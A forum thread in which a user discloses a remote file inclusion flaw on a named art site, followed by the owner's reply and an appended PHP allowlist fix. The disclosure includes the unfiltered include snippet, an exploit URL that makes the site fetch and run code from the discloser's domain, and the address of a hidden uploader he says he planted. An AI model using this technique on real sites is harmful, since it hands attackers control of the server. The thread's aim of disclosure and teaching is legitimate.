Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have.
On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.
I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])
In your script you are including files in a way similar to:
[PHP]
// ...
$filename = $_GET['p'];
include($filename . '.php');
// ...
[/PHP]
You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )
If you include a file into a PHP script, and that file contains PHP tags ("<?" and "?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:
[INDENT][URL="http://nedren.com/help/poc_write.txt?"]http://nedren.com/help/poc_write.txt?[/URL][/INDENT]
And include it into your script:
[INDENT][URL="http://www.hydra-art.net/index.php?p=http://nedren.com/help/poc_write.txt?"]http://www.hydra-art.net/index.php?p=http://nedren.com/help/poc_write.txt?[/URL][/INDENT]
Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename?
The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:
[INDENT][URL="http://www.hydra-art.net/PoC_NedreN.hidden.php"]http://www.hydra-art.net/PoC_NedreN.hidden.php[/URL][/INDENT]
As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.
The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You [B]never[/B] can trust that data supplied by a visitor is "clean" and not harmful in any way at all.
So yeah, I showed you how I did this, so now I'll show you how to fix it.
Please read this, which will help you secure your script fully:
[INDENT][URL="http://forums.x10hosting.com/showthread.php?t=12620"]http://forums.x10hosting.com/showthread.php?t=12620[/URL][/INDENT]
If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.
Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.
Adios,
-Bryon[/quote]
No, it's fine :biggrin: , I actually know there's some big security problem there, I just didn't really have the time earlier (exams) to try and fix it.
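
An allowlist resolver for the `p=` include pattern discussed in this thread, as an added example that is not part of the original posts or the linked guide. The page names, the `pages/` directory and the `resolve_page()` helper are assumptions for illustration.

```php
<?php
// Added example, not the site's code. Page names and directory layout are assumed.

// The only values of "p" that are accepted, mapped to fixed file names.
const PAGES = [
    'home'    => 'home.php',
    'gallery' => 'gallery.php',
];

// Returns the absolute path to include, or null if the request is not allowed.
function resolve_page($requested, string $pagesDir): ?string
{
    // Rejects arrays (?p[]=x), URLs, traversal strings: anything not a known key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or page file is missing
    }
    // Defence in depth: the resolved file must still sit inside $pagesDir
    // (guards against a symlink placed in the pages directory).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demo with constructed inputs: build a throwaway pages directory and probe it.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home page';\n");

$samples = ['home', 'gallery', 'http://example.invalid/x.txt?', '../home', ['home']];
foreach ($samples as $s) {
    $result = resolve_page($s, $dir);
    echo json_encode($s, JSON_UNESCAPED_SLASHES), ' => ',
        $result === null ? 'rejected' : 'include ' . basename($result), "\n";
}

unlink($dir . '/home.php');
rmdir($dir);

// In index.php the call would be:
//   $page = resolve_page($_GET['p'] ?? 'home', __DIR__ . '/pages');
//   if ($page === null) { http_response_code(404); exit('Page not found'); }
//   include $page;
```

Because the request value is only ever used as an array key, nothing the visitor sends reaches `include` as a path. Setting `allow_url_include = Off` in php.ini additionally stops `include` from fetching remote URLs at all.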